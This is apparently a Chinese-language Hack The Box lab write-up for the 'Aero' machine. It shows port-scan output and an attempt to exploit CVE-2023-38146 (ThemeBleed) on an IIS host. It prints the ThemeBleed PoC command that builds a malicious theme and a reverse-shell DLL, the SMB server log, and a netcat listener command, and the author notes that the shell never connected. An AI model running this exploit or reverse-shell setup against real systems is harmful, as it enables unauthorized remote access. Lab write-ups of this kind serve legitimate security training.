HTB——Aero
0x01 信息收集
_____ ___ _
/__ \ ___ ___ __ _ _ __ / _ \| | _ _ ___
/ /\// __| / __| / _' || '_ \ / /_)/| || | | |/ __|
/ / \__ \| (__ | (_| || | | |/ ___/ | || |_| |\__ \
\/ |___/ \___| \__,_||_| |_|\/ |_| \__,_||___/
https://github.com/TideSec/TscanPlus
TscanClient Version: 2.7.4 NewVersion: 2.7.6 Expired: 2026.01.01
[09:46:03] [INFO] Start IpScan:10.129.231.48
[09:46:03] [INFO] 开始扫描 1 个主机的 65535 个端口,共 65535 个任务
[09:46:04] [+] 10.129.231.48:80 open
[09:46:04] [+] [TCP/HTTP] [200] [Microsoft-IIS/10.0] http://10.129.231.48:80 [Aero Theme Hub]
扫描发现仅开放一个TCP端口,只能先访问80端口服务。通过F12查看组件代码,我们可以发现其支持传入themepack与theme后缀名的文件。
0x02 CVE-2023-38146复现
通过检索我们可以发现,CVE-2023-38146满足我们的要求。考虑到持久化目的,我们需要利用dll劫持来完成上线目的。
使用此项目的衍生项目,先生成我们制作的含有反弹shell的恶意dll文件。
┌──(root㉿kali)-[/home/kali/HTB/Aero/CVE-2023-38146-main]
└─# python3 themebleed.py -r 10.10.16.12 -p 4711 -n
2025-04-12 10:56:06,729 INFO> ThemeBleed CVE-2023-38146 PoC [https://github.com/Jnnshschl]
2025-04-12 10:56:06,730 INFO> Credits to -> https://github.com/gabe-k/themebleed, impacket and cabarchive
2025-04-12 10:56:06,730 INFO> Theme generated: "evil_theme.theme"
2025-04-12 10:56:06,730 INFO> Themepack generated: "evil_theme.themepack"
2025-04-12 10:56:06,730 INFO> Remember to start netcat: rlwrap -cAr nc -lvnp 4711
2025-04-12 10:56:06,730 INFO> Starting SMB server: 10.10.16.12:445
2025-04-12 10:56:06,730 INFO> Config file parsed
2025-04-12 10:56:06,730 INFO> Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
2025-04-12 10:56:06,730 INFO> Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
2025-04-12 10:56:06,730 INFO> Config file parsed
2025-04-12 10:56:06,730 INFO> Config file parsed
可惜可能是笔者环境问题,无法正常反弹回shell。以后有机会再深入研究。